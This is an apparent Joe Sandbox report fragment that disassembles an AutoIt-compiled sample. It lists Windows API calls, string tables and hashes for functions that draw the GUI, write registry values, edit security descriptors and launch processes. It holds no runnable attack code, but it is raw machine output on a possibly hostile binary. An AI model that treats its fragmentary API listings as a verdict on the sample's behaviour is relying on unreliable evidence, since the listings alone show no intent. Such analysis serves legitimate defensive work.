                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: fa084152a5a38dde6c2afe6bbe380a3c6256e1610b2f544f14c382c16a845c9a
                                                      • Instruction ID: 41bf63b35904fbfc3ae3ccc3c6a92daf03681829b3289dbf0d06a871ad32413b
                                                      • Opcode Fuzzy Hash: fa084152a5a38dde6c2afe6bbe380a3c6256e1610b2f544f14c382c16a845c9a
                                                      • Instruction Fuzzy Hash: B961E43160514A9FDF24DF26CE82E6DB7A0AF68354B244056F806EB291DB35FD42FB42
                                                      APIs
                                                      • GetSysColor.USER32(00000012), ref: 00FB7421
                                                      • SetTextColor.GDI32(?,?), ref: 00FB7425
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00FB743B
                                                      • GetSysColor.USER32(0000000F), ref: 00FB7446
                                                      • CreateSolidBrush.GDI32(?), ref: 00FB744B
                                                      • GetSysColor.USER32(00000011), ref: 00FB7463
                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00FB7471
                                                      • SelectObject.GDI32(?,00000000), ref: 00FB7482
                                                      • SetBkColor.GDI32(?,00000000), ref: 00FB748B
                                                      • SelectObject.GDI32(?,?), ref: 00FB7498
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00FB74B7
                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00FB74CE
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00FB74DB
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FB752A
                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00FB7554
                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00FB7572
                                                      • DrawFocusRect.USER32(?,?), ref: 00FB757D
                                                      • GetSysColor.USER32(00000011), ref: 00FB758E
                                                      • SetTextColor.GDI32(?,00000000), ref: 00FB7596
                                                      • DrawTextW.USER32(?,00FB70F5,000000FF,?,00000000), ref: 00FB75A8
                                                      • SelectObject.GDI32(?,?), ref: 00FB75BF
                                                      • DeleteObject.GDI32(?), ref: 00FB75CA
                                                      • SelectObject.GDI32(?,?), ref: 00FB75D0
                                                      • DeleteObject.GDI32(?), ref: 00FB75D5
                                                      • SetTextColor.GDI32(?,?), ref: 00FB75DB
                                                      • SetBkColor.GDI32(?,?), ref: 00FB75E5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                      • String ID:
                                                      • API String ID: 1996641542-0
                                                      • Opcode ID: 95e47ef59282e4f45fc804421167cb95eda4541fefa063d658fabbb561d3c4ed
                                                      • Instruction ID: dec36c8093acb84eeee3c84cd3b1ae67656042a5b676baf5f17d36f1383df8fc
                                                      • Opcode Fuzzy Hash: 95e47ef59282e4f45fc804421167cb95eda4541fefa063d658fabbb561d3c4ed
                                                      • Instruction Fuzzy Hash: 31617F72D00218AFDB11AFA4DC88EEE7F79EB48320F144211F915BB2A1D7709940EF90
                                                      APIs
                                                      • GetCursorPos.USER32(?), ref: 00FB1128
                                                      • GetDesktopWindow.USER32 ref: 00FB113D
                                                      • GetWindowRect.USER32(00000000), ref: 00FB1144
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB1199
                                                      • DestroyWindow.USER32(?), ref: 00FB11B9
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00FB11ED
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FB120B
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FB121D
                                                      • SendMessageW.USER32(00000000,00000421,?,?), ref: 00FB1232
                                                      • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00FB1245
                                                      • IsWindowVisible.USER32(00000000), ref: 00FB12A1
                                                      • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00FB12BC
                                                      • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00FB12D0
                                                      • GetWindowRect.USER32(00000000,?), ref: 00FB12E8
                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00FB130E
                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 00FB1328
                                                      • CopyRect.USER32(?,?), ref: 00FB133F
                                                      • SendMessageW.USER32(00000000,00000412,00000000), ref: 00FB13AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                       • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                      • String ID: ($0$tooltips_class32
                                                      • API String ID: 698492251-4156429822
                                                      • Opcode ID: 7bdada09c5fa29c8f487fbf0e4a1b56fee8dc98f0ff2caf08d3a20018a901193
                                                      • Instruction ID: 893cd538ce043e8a4892e3f49c8c3ae41b91f1918eb32daea84c1338d056bc64
                                                      • Opcode Fuzzy Hash: 7bdada09c5fa29c8f487fbf0e4a1b56fee8dc98f0ff2caf08d3a20018a901193
                                                      • Instruction Fuzzy Hash: D1B1BC71608340AFD700DF25C885BABBBE4FF88350F448918F9999B2A1D771E844EF91
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00FB02E5
                                                      • _wcslen.LIBCMT ref: 00FB031F
                                                      • _wcslen.LIBCMT ref: 00FB0389
                                                      • _wcslen.LIBCMT ref: 00FB03F1
                                                      • _wcslen.LIBCMT ref: 00FB0475
                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00FB04C5
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FB0504
                                                        • Part of subcall function 00F3F9F2: _wcslen.LIBCMT ref: 00F3F9FD
                                                        • Part of subcall function 00F8223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F82258
                                                        • Part of subcall function 00F8223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F8228A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                      • API String ID: 1103490817-719923060
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F38968
                                                      • GetSystemMetrics.USER32(00000007), ref: 00F38970
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F3899B
                                                      • GetSystemMetrics.USER32(00000008), ref: 00F389A3
                                                      • GetSystemMetrics.USER32(00000004), ref: 00F389C8
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F389E5
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F389F5
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F38A28
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F38A3C
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00F38A5A
                                                      • GetStockObject.GDI32(00000011), ref: 00F38A76
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F38A81
                                                        • Part of subcall function 00F3912D: GetCursorPos.USER32(?), ref: 00F39141
                                                        • Part of subcall function 00F3912D: ScreenToClient.USER32(00000000,?), ref: 00F3915E
                                                        • Part of subcall function 00F3912D: GetAsyncKeyState.USER32(00000001), ref: 00F39183
                                                        • Part of subcall function 00F3912D: GetAsyncKeyState.USER32(00000002), ref: 00F3919D
                                                      • SetTimer.USER32(00000000,00000000,00000028,00F390FC), ref: 00F38AA8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: AutoIt v3 GUI
                                                      • API String ID: 1458621304-248962490
                                                      APIs
                                                        • Part of subcall function 00F810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F81114
                                                        • Part of subcall function 00F810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F81120
                                                        • Part of subcall function 00F810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F8112F
                                                        • Part of subcall function 00F810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F81136
                                                        • Part of subcall function 00F810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F8114D
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F80DF5
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F80E29
                                                      • GetLengthSid.ADVAPI32(?), ref: 00F80E40
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00F80E7A
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F80E96
                                                      • GetLengthSid.ADVAPI32(?), ref: 00F80EAD
                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F80EB5
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00F80EBC
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F80EDD
                                                      • CopySid.ADVAPI32(00000000), ref: 00F80EE4
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F80F13
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F80F35
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F80F47
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F80F6E
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80F75
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F80F7E
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80F85
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F80F8E
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80F95
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00F80FA1
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80FA8
                                                        • Part of subcall function 00F81193: GetProcessHeap.KERNEL32(00000008,00F80BB1,?,00000000,?,00F80BB1,?), ref: 00F811A1
                                                        • Part of subcall function 00F81193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F80BB1,?), ref: 00F811A8
                                                        • Part of subcall function 00F81193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F80BB1,?), ref: 00F811B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 4175595110-0
                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FAC4BD
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00FBCC08,00000000,?,00000000,?,?), ref: 00FAC544
                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00FAC5A4
                                                      • _wcslen.LIBCMT ref: 00FAC5F4
                                                      • _wcslen.LIBCMT ref: 00FAC66F
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00FAC6B2
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00FAC7C1
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00FAC84D
                                                      • RegCloseKey.ADVAPI32(?), ref: 00FAC881
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FAC88E
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00FAC960
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 9721498-966354055
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00FB09C6
                                                      • _wcslen.LIBCMT ref: 00FB0A01
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FB0A54
                                                      • _wcslen.LIBCMT ref: 00FB0A8A
                                                      • _wcslen.LIBCMT ref: 00FB0B06
                                                      • _wcslen.LIBCMT ref: 00FB0B81
                                                        • Part of subcall function 00F3F9F2: _wcslen.LIBCMT ref: 00F3F9FD
                                                        • Part of subcall function 00F82BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F82BFA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 1103490817-4258414348
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 1256254125-909552448
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00FB835A
                                                      • _wcslen.LIBCMT ref: 00FB836E
                                                      • _wcslen.LIBCMT ref: 00FB8391
                                                      • _wcslen.LIBCMT ref: 00FB83B4
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00FB83F2
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00FB5BF2), ref: 00FB844E
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FB8487
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00FB84CA
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FB8501
                                                      • FreeLibrary.KERNEL32(?), ref: 00FB850D
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FB851D
                                                      • DestroyIcon.USER32(?,?,?,?,?,00FB5BF2), ref: 00FB852C
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00FB8549
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00FB8555
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 799131459-1154884017
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                      • API String ID: 0-1645009161
                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 00F85A2E
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F85A40
                                                      • SetWindowTextW.USER32(?,?), ref: 00F85A57
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00F85A6C
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00F85A72
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00F85A82
                                                      • SetWindowTextW.USER32(00000000,?), ref: 00F85A88
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F85AA9
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F85AC3
                                                      • GetWindowRect.USER32(?,?), ref: 00F85ACC
                                                      • _wcslen.LIBCMT ref: 00F85B33
                                                      • SetWindowTextW.USER32(?,?), ref: 00F85B6F
                                                      • GetDesktopWindow.USER32 ref: 00F85B75
                                                      • GetWindowRect.USER32(00000000), ref: 00F85B7C
                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00F85BD3
                                                      • GetClientRect.USER32(?,?), ref: 00F85BE0
                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00F85C05
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F85C2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                      • String ID:
                                                      • API String ID: 895679908-0
                                                      APIs
                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F400C6
                                                        • Part of subcall function 00F400ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00FF070C,00000FA0,DB22FEF4,?,?,?,?,00F623B3,000000FF), ref: 00F4011C
                                                        • Part of subcall function 00F400ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F623B3,000000FF), ref: 00F40127
                                                        • Part of subcall function 00F400ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F623B3,000000FF), ref: 00F40138
                                                        • Part of subcall function 00F400ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F4014E
                                                        • Part of subcall function 00F400ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F4015C
                                                        • Part of subcall function 00F400ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F4016A
                                                        • Part of subcall function 00F400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F40195
                                                        • Part of subcall function 00F400ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F401A0
                                                      • ___scrt_fastfail.LIBCMT ref: 00F400E7
                                                        • Part of subcall function 00F400A3: __onexit.LIBCMT ref: 00F400A9
                                                      Strings
                                                      • InitializeConditionVariable, xrefs: 00F40148
                                                      • WakeAllConditionVariable, xrefs: 00F40162
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F40122
                                                      • SleepConditionVariableCS, xrefs: 00F40154
                                                      • kernel32.dll, xrefs: 00F40133
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 66158676-1714406822
                                                      APIs
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 176396367-1603158881
                                                      APIs
                                                      • CharLowerBuffW.USER32(00000000,00000000,00FBCC08), ref: 00F94527
                                                      • _wcslen.LIBCMT ref: 00F9453B
                                                      • _wcslen.LIBCMT ref: 00F94599
                                                      • _wcslen.LIBCMT ref: 00F945F4
                                                      • _wcslen.LIBCMT ref: 00F9463F
                                                      • _wcslen.LIBCMT ref: 00F946A7
                                                        • Part of subcall function 00F3F9F2: _wcslen.LIBCMT ref: 00F3F9FD
                                                      • GetDriveTypeW.KERNEL32(?,00FE6BF0,00000061), ref: 00F94743
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                      • API String ID: 2055661098-1000479233
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00FAB198
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FAB1B0
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FAB1D4
                                                      • _wcslen.LIBCMT ref: 00FAB200
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FAB214
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FAB236
                                                      • _wcslen.LIBCMT ref: 00FAB332
                                                        • Part of subcall function 00F905A7: GetStdHandle.KERNEL32(000000F6), ref: 00F905C6
                                                      • _wcslen.LIBCMT ref: 00FAB34B
                                                      • _wcslen.LIBCMT ref: 00FAB366
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FAB3B6
                                                      • GetLastError.KERNEL32(00000000), ref: 00FAB407
                                                      • CloseHandle.KERNEL32(?), ref: 00FAB439
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FAB44A
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FAB45C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FAB46E
                                                      • CloseHandle.KERNEL32(?), ref: 00FAB4E3
                                                      Similarity
                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 2178637699-0
                                                      APIs
